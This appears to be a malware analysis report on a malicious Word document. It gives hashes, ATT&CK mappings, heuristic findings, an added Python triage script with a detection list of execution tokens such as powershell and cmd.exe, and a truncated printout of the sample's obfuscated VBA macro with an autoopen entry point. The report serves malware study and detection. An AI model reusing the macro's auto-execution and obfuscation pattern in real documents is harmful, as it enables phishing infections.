Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b83ed3d9103e35e…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 150.9 KB
Created: 2019-04-05 12:34:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 296f3024eeec314584736afe0e9b964e
SHA-1: 915c145717338fdc60f4e02267d00f8bda204bb4
SHA-256: 2b83ed3d9103e35ebc811b493ead34f4f60acaf05dbc67be7fcfcb8845863eff
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project. The macro module defines an autoopen subroutine, so the code runs as soon as the document is opened and macros are enabled. In the recovered source, autoopen does nothing but call TB_AAcoA, which sets On Error Resume Next (so any failure is silently swallowed) and then continues behind a wall of junk: arithmetic blocks guarded by conditions of the form If 606338906 = 666383500 Then, comparisons of two different integer literals that can never be true. These dead branches exist only to bloat the module and defeat signature matching; the randomised procedure and variable names (iwB4CX, TB_AAcoA, DCAA_oB) serve the same purpose. A GetObject call in the source and, in the compiled p-code stream, an auto-execution token alongside shell/download/object-execution tokens point to the same conclusion. The actual payload is not visible in the truncated preview: auto-execution, error suppression and junk-padded dispatch into an object-instantiation call are the shape of a downloader that fetches a second-stage payload, but the download target and the second stage itself are not established by this analysis and should not be reported as known.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6932000-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6932000-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    An autoopen procedure is present; Word runs it when the document is opened and macros are enabled.
  • GetObject call [high] (OLE_VBA_GETOBJ)
    The macro calls GetObject, which instantiates or retrieves COM objects (for example a scripting shell) from VBA and is a common way to reach execution without naming CreateObject.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents where source extraction fails, i.e. cases where no readable source is available (VBA stomping). Here the decoded source was recovered as well (see Extracted artifacts), so the two views should agree; a mismatch between p-code and source would itself be a strong indicator.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. By itself this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. The heuristic's description assumes no modern VBA project was recovered; on this sample one was, so treat this finding as corroborating the AutoOpen finding rather than as independent evidence.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace URI found in any Office document with drawing content; it is not a contacted host and not an indicator of compromise.
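The two findings above that carry the most weight, the autoopen entry point and the co-occurrence of an auto-execution token with execution tokens, can be reproduced on the decoded source with a short triage script. The Python below is an added example written for this page; it is not part of the analysis platform and not oletools code. The token lists are a representative assumption rather than the platform's rule set, and the embedded sample is a constructed miniature of the preview's structure (same junk pattern, same autoopen to TB_AAcoA dispatch) in which the GetObject argument and the cmd.exe line are hypothetical stand-ins, since the real ones are not visible in the truncated preview. It flags the token co-occurrence, then strips the constant-comparison dead branches and walks the call chain from autoopen so the live statements stand out.

```python
"""Triage helpers for junk-padded VBA: token co-occurrence and dead-branch stripping.
Added example for this report; token lists are a representative assumption."""
import re
from collections import OrderedDict

# Names Office runs automatically and tokens that execute, instantiate or download
# (assumption: representative, not the platform's rules, not exhaustive).
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "document_open", "document_close", "workbook_open", "workbook_close"}
EXEC_TOKENS = {"shell", "wscript.shell", "getobject", "createobject",
               "urldownloadtofile", "xmlhttp", "powershell", "cmd.exe"}

PROC_START = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
CONST_IF = re.compile(r"^\s*If\s+(\d+)\s*=\s*(\d+)\s*Then\s*$", re.I)
ANY_IF = re.compile(r"^\s*If\b.*\bThen\s*$", re.I)   # block If only; ElseIf does not match
END_IF = re.compile(r"^\s*End\s+If\b", re.I)


def _has_token(text, tok):
    """Whole-token, case-insensitive match (a dotted token such as wscript.shell also trips 'shell')."""
    return re.search(r"(?<!\w)" + re.escape(tok) + r"(?!\w)", text, re.I) is not None


def token_flags(text):
    """The OLE_VBA_PCODE_AUTOEXEC_EXEC idea on any decoded text (source or p-code dump):
    flag only when an auto-execution name and an execution/download/object token appear together."""
    auto = sorted(t for t in AUTOEXEC if _has_token(text, t))
    exe = sorted(t for t in EXEC_TOKENS if _has_token(text, t))
    return {"autoexec": auto, "exec": exe, "flag": bool(auto and exe)}


def split_procedures(src):
    """Map procedure name -> body lines, in source order (Attribute lines are skipped)."""
    procs, name, buf = OrderedDict(), None, []
    for line in src.splitlines():
        m = PROC_START.match(line)
        if m and name is None:
            name, buf = m.group(1), []
        elif name is not None:
            if PROC_END.match(line):
                procs[name], name = buf, None
            else:
                buf.append(line)
    return procs


def strip_dead_branches(lines):
    """Drop 'If <int> = <int> Then ... End If' blocks whose literals differ (the opaque-predicate
    junk seen in the preview) and unwrap blocks whose literals are equal. Nested Ifs are tracked."""
    out, i = [], 0
    while i < len(lines):
        m = CONST_IF.match(lines[i])
        if not m:
            out.append(lines[i])
            i += 1
            continue
        live = int(m.group(1)) == int(m.group(2))
        depth, j, body = 1, i + 1, []
        while j < len(lines):
            if END_IF.match(lines[j]):
                depth -= 1
                if depth == 0:
                    break
            elif ANY_IF.match(lines[j]):
                depth += 1
            body.append(lines[j])
            j += 1
        if live:
            out.extend(strip_dead_branches(body))
        i = j + 1          # skip the closing End If
    return out


def call_chain(procs, entry="autoopen"):
    """Breadth-first walk over bare identifiers in live code, starting at the auto-exec entry.
    Identifiers inside string literals are scanned too; they only matter if a procedure shares the name."""
    by_lower = {n.lower(): n for n in procs}
    start = by_lower.get(entry.lower())
    if start is None:
        return []
    order, seen, queue = [], {start}, [start]
    while queue:
        cur = queue.pop(0)
        order.append(cur)
        for ident in re.findall(r"\b\w+\b", "\n".join(strip_dead_branches(procs[cur]))):
            nxt = by_lower.get(ident.lower())
            if nxt and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return order


def triage(src, entry="autoopen"):
    """Token flags for the whole blob plus the live statements of every procedure reachable from entry."""
    procs = split_procedures(src)
    chain = call_chain(procs, entry)
    stripped = {n: strip_dead_branches(procs[n]) for n in chain}
    return {
        "tokens": token_flags(src),
        "chain": chain,
        "live": {n: [l.strip() for l in stripped[n] if l.strip()] for n in chain},
        "dead_lines_removed": sum(len(procs[n]) - len(stripped[n]) for n in chain),
    }


# Constructed miniature of the preview: same junk pattern and autoopen -> TB_AAcoA dispatch.
# The GetObject argument and the cmd.exe line are HYPOTHETICAL stand-ins, not the sample's real code.
SAMPLE = '''Attribute VB_Name = "G4GDD4"
Function iwB4CX()
   If 606338906 = 666383500 Then
      jwUAAAC = 800265766 + Hex(wQAUCQo)
   End If
End Function
Sub autoopen()
TB_AAcoA
End Sub
Function TB_AAcoA()
On Error Resume Next
   If 953353816 = 149571536 Then
      VxZBQA1 = 674832449 + Hex(zDcAw_4B)
   End If
   If 1 = 1 Then
      Set o = GetObject("new:HYPOTHETICAL")
   End If
   DCAA_oB
   o.Exec "cmd.exe /c hypothetical"
End Function
Function DCAA_oB()
   If 837509444 = 13256662 Then
      EA1AAw = 648339908 + Hex(wA4B4AA)
   End If
End Function
'''

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("tokens:", result["tokens"])
    print("chain:", " -> ".join(result["chain"]), "| dead lines removed:", result["dead_lines_removed"])
    for name, live in result["live"].items():
        print(name, live)
```

To run it on the real artifact, pass the text of macros.bas (or the output of olevba --deobf on the original document) to triage(). For a stomped document where olevba recovers no source, run token_flags over a p-code disassembly (pcodedmp produces one) instead; that is the signal the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes, and a chain that ends in GetObject with no visible argument is the point at which static triage stops and a sandbox run or debugger trace has to take over.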

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31386 bytes
SHA-256: d16d8925fa0eac0c4f7c33ba9b4d62d628f55d527f51810bbc27e08f84ee347a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hkQkBXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zAAB1AA"
Attribute VB_Base = "0{03D8C51D-3E76-4A2B-92D4-ECC7A6EAD2E7}{A5B7373E-E6C8-4A1D-B36A-8277CE1DD7FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AX1AQk"
Attribute VB_Base = "0{CBBD121C-2ED8-4FE0-A1B2-CD5D30AC3D66}{B7B4EAE5-D685-486B-8640-2A131AF5AB7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "G4GDD4"
Function iwB4CX()
   If 606338906 = 666383500 Then
      jwUAAAC = 800265766 + Hex(wQAUCQo) + 112256309 / v4wAU_U * (JZ_AkA * CSng(981972793 / CByte(YAAQ1cA)) - fAC1ZAAQ - Sqr(DA1AAQ / 278689676 + 28565801 + CDate(vccZAABA - Sgn(367382793) + JZ4AZ1 * 898108508))) + (7754973 + 829126681 + 814460599 * wcAXAGc)
End If
   If 444000992 = 487442409 Then
      qDCDkXZ1 = 752939221 + Hex(RBBQU4UA) + 320405955 / iQxABkAA * (MUQBGBZA * CSng(332167598 / CByte(fw_oDABA)) - wAAGAD - Sqr(UDkGADA / 15253373 + 909465096 + CDate(vXcADA - Sgn(311298961) + ZwD4AQ * 253291125))) + (893828359 + 623783325 + 162218269 * c_CZUC)
End If
End Function
Sub autoopen()
TB_AAcoA
End Sub
Function DCAA_oB()
   If 837509444 = 13256662 Then
      EA1AAw = 648339908 + Hex(wA4B4AA) + 702925007 / iQXDAA * (dA1A4Uox * CSng(348974770 / CByte(GDACoA)) - MkAkAG - Sqr(poQko_1D / 782550943 + 322476671 + CDate(tcB1cQ - Sgn(34610043) + iACACAAA * 155203454))) + (985608257 + 136150987 + 792762787 * HBx1GA)
End If
   If 165504273 = 420262227 Then
      qZQDQA = 938102217 + Hex(SoABCAB) + 412060701 / XD4AABDx * (uoABkBUG * CSng(742854937 / CByte(LxD1DDw)) - wQCZACwo - Sqr(VxA4Z_AA / 703137807 + 357007553 + CDate(iZ_wDw - Sgn(322666959) + HDxADA * 236969735))) + (83090737 + 187495052 + 374884522 * z1_AAoA)
End If
   If 227070193 = 334906177 Then
      SkAAQ1U = 713637544 + Hex(KxAXAk4k) + 489164095 / ABCAoUCX * (PAAkXUo * CSng(669353621 / CByte(SDQQAAQX)) - FBC4D1XB - Sqr(WZA1AAXA / 993448202 + 744096749 + CDate(O__AAAU - Sgn(833963735) + SCA_1QQo * 187486212))) + (16635810 + 4181086 + 321067219 * JZAoBUXk)
End If
End Function

Attribute VB_Name = "akAwQAB"
Function ICBAAA1D()
   If 142505114 = 848699848 Then
      jCQoBUAZ = 497725971 + Hex(f1ZAGc) + 420932561 / mZQx4A * (ZAUAoU * CSng(683011150 / CByte(pUCkAB)) - WAA1A_UA - Sqr(FXQ1C4 / 736258905 + 4291415 + CDate(jU4ADQ - Sgn(179825284) + KAAQAAU * 638750389))) + (723798843 + 256013966 + 193281786 * wQBUAZ)
End If
   If 908281183 = 402182110 Then
      EDAA4D = 938428344 + Hex(IZAAxAQ) + 703556760 / KXA4G4A * (mAABZx * CSng(94185553 / CByte(aDXoAAAk)) - SGUGAA - Sqr(SQDAowUD / 291560126 + 533911988 + CDate(HABDXQA - Sgn(348274229) + pBDAZBA * 649607576))) + (575705706 + 82929628 + 338310450 * WAXwcAAx)
End If
End Function
Function TB_AAcoA()
On Error Resume Next
   If 138115491 = 214476140 Then
      AQBoGX = 864728554 + Hex(iABAAX) + 832274858 / RDDw4BAA * (ZA4wUD * CSng(170831004 / CByte(jUA_CB)) - qG_AAADo - Sqr(pAcADAAD / 320474809 + 60350230 + CDate(JAA4UA - Sgn(711045762) + hQkxGc * 779058464))) + (770843382 + 381536784 + 242471098 * IDxw4D)
End If
   If 953353816 = 149571536 Then
      VxZBQA1 = 674832449 + Hex(zDcAw_4B) + 1492837 / jAUGkB * (Ik4DABGU * CSng(509835581 / CByte(s1X41oD)) - z_UA_QU - Sqr(vABQAD / 649395149 + 376569709 + CDate(QQADZUA - Sgn(795080199) + FAAAAQ * 697558301))) + (729799797 + 463151164 + 893101993 * P14AQADD)
End If
   If 895421455 = 739676634 Then
      UQ_QB4 = 551537469 + Hex(jA4GUU_) + 681265826 / MDcAQQw * (BXXQAQAZ * CSng(729509407 / CByte(ww1xBAUB)) - vAkXAA - Sqr(
... (truncated)